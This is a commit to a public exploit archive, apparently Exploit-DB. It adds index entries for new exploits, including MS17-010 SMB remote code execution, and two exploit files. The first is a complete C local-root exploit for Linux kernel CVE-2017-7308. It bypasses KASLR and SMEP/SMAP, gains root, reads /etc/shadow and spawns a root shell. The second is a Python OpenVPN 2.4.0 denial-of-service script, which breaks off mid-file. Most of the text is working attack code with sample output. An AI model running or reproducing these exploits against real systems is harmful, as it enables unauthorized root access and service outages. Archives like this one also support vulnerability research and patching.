DB: 2017-05-12
5 new exploits OpenVPN 2.4.0 - Unauthenticated Denial of Service Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Privilege Escalation (3) Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Privilege Escalation (3) Linux Kernel 4.8.0 - Packet Socket Local root Privilege Escalation Microsoft Windows - SrvOs2FeaToNt SMB Remote Code Execution (MS17-010) Microsoft Windows - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010) Microsoft IIS WebDav - ScStoragePathFromUrl Overflow (Metasploit)
This commit is contained in:
parent
5aee851cfb
commit
b6bbf710eb
6 changed files with 780 additions and 2 deletions
|
@ -5490,6 +5490,7 @@ id,file,description,date,author,platform,type,port
|
|||
41983,platforms/android/dos/41983.txt,"LG G4 MRA58K - 'mkvparser::Block::Block' Heap Buffer Overflows",2017-05-09,"Google Security Research",android,dos,0
|
||||
41984,platforms/multiple/dos/41984.txt,"wolfSSL 3.10.2 - x509 Certificate Text Parsing Off-by-One",2017-05-09,Talos,multiple,dos,0
|
||||
41991,platforms/linux/dos/41991.py,"SAP SAPCAR 721.510 - Heap-Based Buffer Overflow",2017-05-10,"Core Security",linux,dos,0
|
||||
41993,platforms/multiple/dos/41993.py,"OpenVPN 2.4.0 - Unauthenticated Denial of Service",2017-05-11,QuarksLab,multiple,dos,1194
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -8295,7 +8296,7 @@ id,file,description,date,author,platform,type,port
|
|||
31151,platforms/linux/local/31151.c,"GKrellM GKrellWeather 0.2.7 Plugin - Local Stack Based Buffer Overflow",2008-02-12,forensec,linux,local,0
|
||||
31182,platforms/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",windows,local,0
|
||||
31346,platforms/linux/local/31346.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write Exploit (2)",2014-02-02,saelo,linux,local,0
|
||||
31347,platforms/lin_x86/local/31347.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Privilege Escalation (3)",2014-02-02,rebel,lin_x86,local,0
|
||||
31347,platforms/lin_x86-64/local/31347.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Privilege Escalation (3)",2014-02-02,rebel,lin_x86-64,local,0
|
||||
31386,platforms/windows/local/31386.rb,"Adrenalin Player 2.2.5.3 - '.m3u' Buffer Overflow (SEH) ASLR + DEP Bypass",2014-02-04,"Muhamad Fadzil Ramli",windows,local,0
|
||||
31460,platforms/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Privilege Escalation",2014-02-06,LiquidWorm,windows,local,0
|
||||
31524,platforms/windows/local/31524.rb,"Publish-It 3.6d - '.pui' Buffer Overflow (SEH)",2014-02-08,"Muhamad Fadzil Ramli",windows,local,0
|
||||
|
@ -8978,6 +8979,7 @@ id,file,description,date,author,platform,type,port
|
|||
41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0
|
||||
41972,platforms/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",windows,local,0
|
||||
41973,platforms/linux/local/41973.txt,"Xen 64bit PV Guest - pagetable use-after-type-change Breakout",2017-05-08,"Google Security Research",linux,local,0
|
||||
41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0 - Packet Socket Local root Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -15467,7 +15469,7 @@ id,file,description,date,author,platform,type,port
|
|||
41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0
|
||||
41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0
|
||||
41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0
|
||||
41987,platforms/windows/remote/41987.c,"Microsoft Windows - SrvOs2FeaToNt SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0
|
||||
41987,platforms/windows/remote/41987.py,"Microsoft Windows - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0
|
||||
41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0
|
||||
41719,platforms/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit)",2017-03-24,Metasploit,hardware,remote,80
|
||||
41720,platforms/python/remote/41720.rb,"Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",python,remote,0
|
||||
|
@ -15496,6 +15498,7 @@ id,file,description,date,author,platform,type,port
|
|||
41975,platforms/windows/remote/41975.txt,"Microsoft Security Essentials / SCEP (Microsoft Windows 8/8.1/10 / Windows Server) - 'MsMpEng' Remotely Exploitable Type Confusion",2017-05-09,"Google Security Research",windows,remote,0
|
||||
41978,platforms/multiple/remote/41978.py,"Oracle GoldenGate 12.1.2.0.0 - Unauthenticated Remote Code Execution",2017-05-09,"Silent Signal",multiple,remote,0
|
||||
41980,platforms/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,Metasploit,python,remote,80
|
||||
41992,platforms/windows/remote/41992.rb,"Microsoft IIS WebDav - ScStoragePathFromUrl Overflow (Metasploit)",2017-05-11,Metasploit,windows,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
|
Can't render this file because it is too large.
|
497
platforms/linux/local/41994.c
Executable file
497
platforms/linux/local/41994.c
Executable file
|
@ -0,0 +1,497 @@
|
|||
// A proof-of-concept local root exploit for CVE-2017-7308.
|
||||
// Includes a SMEP & SMAP bypass.
|
||||
// Tested on 4.8.0-41-generic Ubuntu kernel.
|
||||
// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308
|
||||
//
|
||||
// Usage:
|
||||
// user@ubuntu:~$ uname -a
|
||||
// Linux ubuntu 4.8.0-41-generic #44~16.04.1-Ubuntu SMP Fri Mar 3 ...
|
||||
// user@ubuntu:~$ gcc pwn.c -o pwn
|
||||
// user@ubuntu:~$ ./pwn
|
||||
// [.] starting
|
||||
// [.] namespace sandbox set up
|
||||
// [.] KASLR bypass enabled, getting kernel addr
|
||||
// [.] done, kernel text: ffffffff87000000
|
||||
// [.] commit_creds: ffffffff870a5cf0
|
||||
// [.] prepare_kernel_cred: ffffffff870a60e0
|
||||
// [.] native_write_cr4: ffffffff87064210
|
||||
// [.] padding heap
|
||||
// [.] done, heap is padded
|
||||
// [.] SMEP & SMAP bypass enabled, turning them off
|
||||
// [.] done, SMEP & SMAP should be off now
|
||||
// [.] executing get root payload 0x401516
|
||||
// [.] done, should be root now
|
||||
// [.] checking if we got root
|
||||
// [+] got r00t ^_^
|
||||
// root@ubuntu:/home/user# cat /etc/shadow
|
||||
// root:!:17246:0:99999:7:::
|
||||
// daemon:*:17212:0:99999:7:::
|
||||
// bin:*:17212:0:99999:7:::
|
||||
// ...
|
||||
//
|
||||
// Andrey Konovalov <andreyknvl@gmail.com>
|
||||
|
||||
#define _GNU_SOURCE
|
||||
|
||||
#include <errno.h>
|
||||
#include <fcntl.h>
|
||||
#include <stdarg.h>
|
||||
#include <stdbool.h>
|
||||
#include <stddef.h>
|
||||
#include <stdint.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <unistd.h>
|
||||
#include <sched.h>
|
||||
|
||||
#include <sys/ioctl.h>
|
||||
#include <sys/klog.h>
|
||||
#include <sys/mman.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/syscall.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/wait.h>
|
||||
|
||||
#include <arpa/inet.h>
|
||||
#include <linux/if_packet.h>
|
||||
#include <linux/ip.h>
|
||||
#include <linux/udp.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <net/if.h>
|
||||
|
||||
#define ENABLE_KASLR_BYPASS 1
|
||||
#define ENABLE_SMEP_SMAP_BYPASS 1
|
||||
|
||||
// Will be overwritten if ENABLE_KASLR_BYPASS
|
||||
unsigned long KERNEL_BASE = 0xffffffff81000000ul;
|
||||
|
||||
// Kernel symbol offsets
|
||||
#define COMMIT_CREDS 0xa5cf0ul
|
||||
#define PREPARE_KERNEL_CRED 0xa60e0ul
|
||||
#define NATIVE_WRITE_CR4 0x64210ul
|
||||
|
||||
// Should have SMEP and SMAP bits disabled
|
||||
#define CR4_DESIRED_VALUE 0x407f0ul
|
||||
|
||||
#define KMALLOC_PAD 512
|
||||
#define PAGEALLOC_PAD 1024
|
||||
|
||||
// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *
|
||||
|
||||
typedef uint32_t u32;
|
||||
|
||||
// $ pahole -C hlist_node ./vmlinux
|
||||
struct hlist_node {
|
||||
struct hlist_node * next; /* 0 8 */
|
||||
struct hlist_node * * pprev; /* 8 8 */
|
||||
};
|
||||
|
||||
// $ pahole -C timer_list ./vmlinux
|
||||
struct timer_list {
|
||||
struct hlist_node entry; /* 0 16 */
|
||||
long unsigned int expires; /* 16 8 */
|
||||
void (*function)(long unsigned int); /* 24 8 */
|
||||
long unsigned int data; /* 32 8 */
|
||||
u32 flags; /* 40 4 */
|
||||
int start_pid; /* 44 4 */
|
||||
void * start_site; /* 48 8 */
|
||||
char start_comm[16]; /* 56 16 */
|
||||
};
|
||||
|
||||
// packet_sock->rx_ring->prb_bdqc->retire_blk_timer
|
||||
#define TIMER_OFFSET 896
|
||||
|
||||
// pakcet_sock->xmit
|
||||
#define XMIT_OFFSET 1304
|
||||
|
||||
// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *
|
||||
|
||||
void packet_socket_rx_ring_init(int s, unsigned int block_size,
|
||||
unsigned int frame_size, unsigned int block_nr,
|
||||
unsigned int sizeof_priv, unsigned int timeout) {
|
||||
int v = TPACKET_V3;
|
||||
int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
|
||||
if (rv < 0) {
|
||||
perror("[-] setsockopt(PACKET_VERSION)");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
struct tpacket_req3 req;
|
||||
memset(&req, 0, sizeof(req));
|
||||
req.tp_block_size = block_size;
|
||||
req.tp_frame_size = frame_size;
|
||||
req.tp_block_nr = block_nr;
|
||||
req.tp_frame_nr = (block_size * block_nr) / frame_size;
|
||||
req.tp_retire_blk_tov = timeout;
|
||||
req.tp_sizeof_priv = sizeof_priv;
|
||||
req.tp_feature_req_word = 0;
|
||||
|
||||
rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
|
||||
if (rv < 0) {
|
||||
perror("[-] setsockopt(PACKET_RX_RING)");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
}
|
||||
|
||||
int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
|
||||
unsigned int block_nr, unsigned int sizeof_priv, int timeout) {
|
||||
int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
|
||||
if (s < 0) {
|
||||
perror("[-] socket(AF_PACKET)");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
packet_socket_rx_ring_init(s, block_size, frame_size, block_nr,
|
||||
sizeof_priv, timeout);
|
||||
|
||||
struct sockaddr_ll sa;
|
||||
memset(&sa, 0, sizeof(sa));
|
||||
sa.sll_family = PF_PACKET;
|
||||
sa.sll_protocol = htons(ETH_P_ALL);
|
||||
sa.sll_ifindex = if_nametoindex("lo");
|
||||
sa.sll_hatype = 0;
|
||||
sa.sll_pkttype = 0;
|
||||
sa.sll_halen = 0;
|
||||
|
||||
int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
|
||||
if (rv < 0) {
|
||||
perror("[-] bind(AF_PACKET)");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
return s;
|
||||
}
|
||||
|
||||
void packet_socket_send(int s, char *buffer, int size) {
|
||||
struct sockaddr_ll sa;
|
||||
memset(&sa, 0, sizeof(sa));
|
||||
sa.sll_ifindex = if_nametoindex("lo");
|
||||
sa.sll_halen = ETH_ALEN;
|
||||
|
||||
if (sendto(s, buffer, size, 0, (struct sockaddr *)&sa,
|
||||
sizeof(sa)) < 0) {
|
||||
perror("[-] sendto(SOCK_RAW)");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
}
|
||||
|
||||
void loopback_send(char *buffer, int size) {
|
||||
int s = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
|
||||
if (s == -1) {
|
||||
perror("[-] socket(SOCK_RAW)");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
packet_socket_send(s, buffer, size);
|
||||
}
|
||||
|
||||
int packet_sock_kmalloc() {
|
||||
int s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));
|
||||
if (s == -1) {
|
||||
perror("[-] socket(SOCK_DGRAM)");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
return s;
|
||||
}
|
||||
|
||||
void packet_sock_timer_schedule(int s, int timeout) {
|
||||
packet_socket_rx_ring_init(s, 0x1000, 0x1000, 1, 0, timeout);
|
||||
}
|
||||
|
||||
void packet_sock_id_match_trigger(int s) {
|
||||
char buffer[16];
|
||||
packet_socket_send(s, &buffer[0], sizeof(buffer));
|
||||
}
|
||||
|
||||
// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
|
||||
|
||||
#define ALIGN(x, a) __ALIGN_KERNEL((x), (a))
|
||||
#define __ALIGN_KERNEL(x, a) __ALIGN_KERNEL_MASK(x, (typeof(x))(a) - 1)
|
||||
#define __ALIGN_KERNEL_MASK(x, mask) (((x) + (mask)) & ~(mask))
|
||||
|
||||
#define V3_ALIGNMENT (8)
|
||||
#define BLK_HDR_LEN (ALIGN(sizeof(struct tpacket_block_desc), V3_ALIGNMENT))
|
||||
|
||||
#define ETH_HDR_LEN sizeof(struct ethhdr)
|
||||
#define IP_HDR_LEN sizeof(struct iphdr)
|
||||
#define UDP_HDR_LEN sizeof(struct udphdr)
|
||||
|
||||
#define UDP_HDR_LEN_FULL (ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN)
|
||||
|
||||
int oob_setup(int offset) {
|
||||
unsigned int maclen = ETH_HDR_LEN;
|
||||
unsigned int netoff = TPACKET_ALIGN(TPACKET3_HDRLEN +
|
||||
(maclen < 16 ? 16 : maclen));
|
||||
unsigned int macoff = netoff - maclen;
|
||||
unsigned int sizeof_priv = (1u<<31) + (1u<<30) +
|
||||
0x8000 - BLK_HDR_LEN - macoff + offset;
|
||||
return packet_socket_setup(0x8000, 2048, 2, sizeof_priv, 100);
|
||||
}
|
||||
|
||||
void oob_write(char *buffer, int size) {
|
||||
loopback_send(buffer, size);
|
||||
}
|
||||
|
||||
void oob_timer_execute(void *func, unsigned long arg) {
|
||||
oob_setup(2048 + TIMER_OFFSET - 8);
|
||||
|
||||
int i;
|
||||
for (i = 0; i < 32; i++) {
|
||||
int timer = packet_sock_kmalloc();
|
||||
packet_sock_timer_schedule(timer, 1000);
|
||||
}
|
||||
|
||||
char buffer[2048];
|
||||
memset(&buffer[0], 0, sizeof(buffer));
|
||||
|
||||
struct timer_list *timer = (struct timer_list *)&buffer[8];
|
||||
timer->function = func;
|
||||
timer->data = arg;
|
||||
timer->flags = 1;
|
||||
|
||||
oob_write(&buffer[0] + 2, sizeof(*timer) + 8 - 2);
|
||||
|
||||
sleep(1);
|
||||
}
|
||||
|
||||
void oob_id_match_execute(void *func) {
|
||||
int s = oob_setup(2048 + XMIT_OFFSET - 64);
|
||||
|
||||
int ps[32];
|
||||
|
||||
int i;
|
||||
for (i = 0; i < 32; i++)
|
||||
ps[i] = packet_sock_kmalloc();
|
||||
|
||||
char buffer[2048];
|
||||
memset(&buffer[0], 0, 2048);
|
||||
|
||||
void **xmit = (void **)&buffer[64];
|
||||
*xmit = func;
|
||||
|
||||
oob_write((char *)&buffer[0] + 2, sizeof(*xmit) + 64 - 2);
|
||||
|
||||
for (i = 0; i < 32; i++)
|
||||
packet_sock_id_match_trigger(ps[i]);
|
||||
}
|
||||
|
||||
// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * *
|
||||
|
||||
void kmalloc_pad(int count) {
|
||||
int i;
|
||||
for (i = 0; i < count; i++)
|
||||
packet_sock_kmalloc();
|
||||
}
|
||||
|
||||
void pagealloc_pad(int count) {
|
||||
packet_socket_setup(0x8000, 2048, count, 0, 100);
|
||||
}
|
||||
|
||||
// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *
|
||||
|
||||
typedef unsigned long __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
|
||||
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
|
||||
|
||||
void get_root_payload(void) {
|
||||
((_commit_creds)(KERNEL_BASE + COMMIT_CREDS))(
|
||||
((_prepare_kernel_cred)(KERNEL_BASE + PREPARE_KERNEL_CRED))(0)
|
||||
);
|
||||
}
|
||||
|
||||
// * * * * * * * * * * * * * Simple KASLR bypass * * * * * * * * * * * * * * *
|
||||
|
||||
#define SYSLOG_ACTION_READ_ALL 3
|
||||
#define SYSLOG_ACTION_SIZE_BUFFER 10
|
||||
|
||||
unsigned long get_kernel_addr() {
|
||||
int size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
|
||||
if (size == -1) {
|
||||
perror("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
size = (size / getpagesize() + 1) * getpagesize();
|
||||
char *buffer = (char *)mmap(NULL, size, PROT_READ|PROT_WRITE,
|
||||
MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
|
||||
|
||||
size = klogctl(SYSLOG_ACTION_READ_ALL, &buffer[0], size);
|
||||
if (size == -1) {
|
||||
perror("[-] klogctl(SYSLOG_ACTION_READ_ALL)");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
const char *needle1 = "Freeing SMP";
|
||||
char *substr = (char *)memmem(&buffer[0], size, needle1, strlen(needle1));
|
||||
if (substr == NULL) {
|
||||
fprintf(stderr, "[-] substring '%s' not found in dmesg\n", needle1);
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
for (size = 0; substr[size] != '\n'; size++);
|
||||
|
||||
const char *needle2 = "ffff";
|
||||
substr = (char *)memmem(&substr[0], size, needle2, strlen(needle2));
|
||||
if (substr == NULL) {
|
||||
fprintf(stderr, "[-] substring '%s' not found in dmesg\n", needle2);
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
char *endptr = &substr[16];
|
||||
unsigned long r = strtoul(&substr[0], &endptr, 16);
|
||||
|
||||
r &= 0xfffffffffff00000ul;
|
||||
r -= 0x1000000ul;
|
||||
|
||||
return r;
|
||||
}
|
||||
|
||||
// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
|
||||
|
||||
void exec_shell() {
|
||||
char *shell = "/bin/bash";
|
||||
char *args[] = {shell, "-i", NULL};
|
||||
execve(shell, args, NULL);
|
||||
}
|
||||
|
||||
void fork_shell() {
|
||||
pid_t rv;
|
||||
|
||||
rv = fork();
|
||||
if (rv == -1) {
|
||||
perror("[-] fork()");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (rv == 0) {
|
||||
exec_shell();
|
||||
}
|
||||
}
|
||||
|
||||
bool is_root() {
|
||||
// We can't simple check uid, since we're running inside a namespace
|
||||
// with uid set to 0. Try opening /etc/shadow instead.
|
||||
int fd = open("/etc/shadow", O_RDONLY);
|
||||
if (fd == -1)
|
||||
return false;
|
||||
close(fd);
|
||||
return true;
|
||||
}
|
||||
|
||||
void check_root() {
|
||||
printf("[.] checking if we got root\n");
|
||||
|
||||
if (!is_root()) {
|
||||
printf("[-] something went wrong =(\n");
|
||||
return;
|
||||
}
|
||||
|
||||
printf("[+] got r00t ^_^\n");
|
||||
|
||||
// Fork and exec instead of just doing the exec to avoid potential
|
||||
// memory corruptions when closing packet sockets.
|
||||
fork_shell();
|
||||
}
|
||||
|
||||
bool write_file(const char* file, const char* what, ...) {
|
||||
char buf[1024];
|
||||
va_list args;
|
||||
va_start(args, what);
|
||||
vsnprintf(buf, sizeof(buf), what, args);
|
||||
va_end(args);
|
||||
buf[sizeof(buf) - 1] = 0;
|
||||
int len = strlen(buf);
|
||||
|
||||
int fd = open(file, O_WRONLY | O_CLOEXEC);
|
||||
if (fd == -1)
|
||||
return false;
|
||||
if (write(fd, buf, len) != len) {
|
||||
close(fd);
|
||||
return false;
|
||||
}
|
||||
close(fd);
|
||||
return true;
|
||||
}
|
||||
|
||||
void setup_sandbox() {
|
||||
int real_uid = getuid();
|
||||
int real_gid = getgid();
|
||||
|
||||
if (unshare(CLONE_NEWUSER) != 0) {
|
||||
perror("[-] unshare(CLONE_NEWUSER)");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (unshare(CLONE_NEWNET) != 0) {
|
||||
perror("[-] unshare(CLONE_NEWUSER)");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (!write_file("/proc/self/setgroups", "deny")) {
|
||||
perror("[-] write_file(/proc/self/set_groups)");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)){
|
||||
perror("[-] write_file(/proc/self/uid_map)");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
|
||||
perror("[-] write_file(/proc/self/gid_map)");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
cpu_set_t my_set;
|
||||
CPU_ZERO(&my_set);
|
||||
CPU_SET(0, &my_set);
|
||||
if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
|
||||
perror("[-] sched_setaffinity()");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (system("/sbin/ifconfig lo up") != 0) {
|
||||
perror("[-] system(/sbin/ifconfig lo up)");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
}
|
||||
|
||||
int main() {
|
||||
printf("[.] starting\n");
|
||||
|
||||
setup_sandbox();
|
||||
|
||||
printf("[.] namespace sandbox set up\n");
|
||||
|
||||
#if ENABLE_KASLR_BYPASS
|
||||
printf("[.] KASLR bypass enabled, getting kernel addr\n");
|
||||
KERNEL_BASE = get_kernel_addr();
|
||||
printf("[.] done, kernel text: %lx\n", KERNEL_BASE);
|
||||
#endif
|
||||
|
||||
printf("[.] commit_creds: %lx\n", KERNEL_BASE + COMMIT_CREDS);
|
||||
printf("[.] prepare_kernel_cred: %lx\n", KERNEL_BASE + PREPARE_KERNEL_CRED);
|
||||
|
||||
#if ENABLE_SMEP_SMAP_BYPASS
|
||||
printf("[.] native_write_cr4: %lx\n", KERNEL_BASE + NATIVE_WRITE_CR4);
|
||||
#endif
|
||||
|
||||
printf("[.] padding heap\n");
|
||||
kmalloc_pad(KMALLOC_PAD);
|
||||
pagealloc_pad(PAGEALLOC_PAD);
|
||||
printf("[.] done, heap is padded\n");
|
||||
|
||||
#if ENABLE_SMEP_SMAP_BYPASS
|
||||
printf("[.] SMEP & SMAP bypass enabled, turning them off\n");
|
||||
oob_timer_execute((void *)(KERNEL_BASE + NATIVE_WRITE_CR4), CR4_DESIRED_VALUE);
|
||||
printf("[.] done, SMEP & SMAP should be off now\n");
|
||||
#endif
|
||||
|
||||
printf("[.] executing get root payload %p\n", &get_root_payload);
|
||||
oob_id_match_execute((void *)&get_root_payload);
|
||||
printf("[.] done, should be root now\n");
|
||||
|
||||
check_root();
|
||||
|
||||
while (1) sleep(1000);
|
||||
|
||||
return 0;
|
||||
}
|
100
platforms/multiple/dos/41993.py
Executable file
100
platforms/multiple/dos/41993.py
Executable file
|
@ -0,0 +1,100 @@
|
|||
#!/usr/bin/env python3
|
||||
'''
|
||||
$ ./dos_server.py &
|
||||
$ sudo ./openvpn-2.4.0/src/openvpn/openvpn conf/server-tls.conf
|
||||
...
|
||||
Fri Feb 24 10:19:19 2017 192.168.149.1:64249 TLS: Initial packet from [AF_INET]192.168.149.1:64249, sid=9a6c48a6 1467f5e1
|
||||
Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Assertion failed at ssl.c:3711 (buf_copy(in, buf))
|
||||
Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Exiting due to fatal error
|
||||
Fri Feb 24 10:19:19 2017 192.168.149.1:64249 /sbin/route del -net 10.8.0.0 netmask 255.255.255.0
|
||||
Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Closing TUN/TAP interface Fri Feb 24 10:19:19 2017 192.168.149.1:64249 /sbin/ifconfig tun0 0.0.0.0
|
||||
'''
|
||||
|
||||
import binascii
|
||||
import os
|
||||
import socket
|
||||
from construct import *
|
||||
HOST, PORT = "192.168.0.1", 1194
|
||||
|
||||
SessionID = Bytes(8)
|
||||
|
||||
PControlV1 = Struct(
|
||||
"packet_id" / Int32ub,
|
||||
"data" / GreedyBytes
|
||||
)
|
||||
|
||||
PAckV1 = Struct(
|
||||
"remote_session_id" / SessionID
|
||||
)
|
||||
|
||||
PControlHardResetClientV2 = Struct(
|
||||
"packet_id" / Int32ub
|
||||
)
|
||||
|
||||
PControlHardResetServerV2 = Struct(
|
||||
"remote_session_id" / SessionID,
|
||||
"packet_id" / Int32ub
|
||||
)
|
||||
|
||||
OpenVPNPacket = Struct(
|
||||
EmbeddedBitStruct(
|
||||
"opcode" / Enum(BitsInteger(5),
|
||||
P_CONTROL_HARD_RESET_CLIENT_V1=1,
|
||||
P_CONTROL_HARD_RESET_SERVER_V1=2,
|
||||
P_CONTROL_HARD_RESET_CLIENT_V2=7,
|
||||
P_CONTROL_HARD_RESET_SERVER_V2=8,
|
||||
P_CONTROL_SOFT_RESET_V1=3,
|
||||
P_CONTROL_V1=4,
|
||||
P_ACK_V1=5,
|
||||
P_DATA_V1=6),
|
||||
"key_id" / BitsInteger(3)
|
||||
),
|
||||
"session_id" / SessionID,
|
||||
"ack_packets" / PrefixedArray(Int8ub, Int32ub),
|
||||
Embedded(Switch(this.opcode,
|
||||
{
|
||||
"P_CONTROL_V1": PControlV1,
|
||||
"P_ACK_V1": PAckV1,
|
||||
"P_CONTROL_HARD_RESET_CLIENT_V2": PControlHardResetClientV2,
|
||||
"P_CONTROL_HARD_RESET_SERVER_V2": PControlHardResetServerV2
|
||||
}))
|
||||
)
|
||||
def main():
|
||||
session_id = os.urandom(8)
|
||||
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
reset_client = OpenVPNPacket.build({
|
||||
"opcode": "P_CONTROL_HARD_RESET_CLIENT_V2",
|
||||
"key_id": 0,
|
||||
"session_id": session_id,
|
||||
"ack_packets": [],
|
||||
"packet_id": 0})
|
||||
|
||||
sock.sendto(reset_client, (HOST, PORT))
|
||||
|
||||
data, addr = sock.recvfrom(8192)
|
||||
reset_server = OpenVPNPacket.parse(data)
|
||||
|
||||
remote_session_id = reset_server.session_id
|
||||
|
||||
# ack server packet
|
||||
ack_packet = OpenVPNPacket.build({
|
||||
"opcode": "P_ACK_V1",
|
||||
"key_id": 0,
|
||||
"session_id": session_id,
|
||||
"ack_packets": [reset_server.packet_id],
|
||||
"remote_session_id": remote_session_id
|
||||
})
|
||||
sock.sendto(ack_packet, (HOST, PORT))
|
||||
|
||||
control_packet = OpenVPNPacket.build({
|
||||
"opcode": "P_CONTROL_V1",
|
||||
"key_id": 0,
|
||||
"session_id": session_id,
|
||||
"ack_packets": [],
|
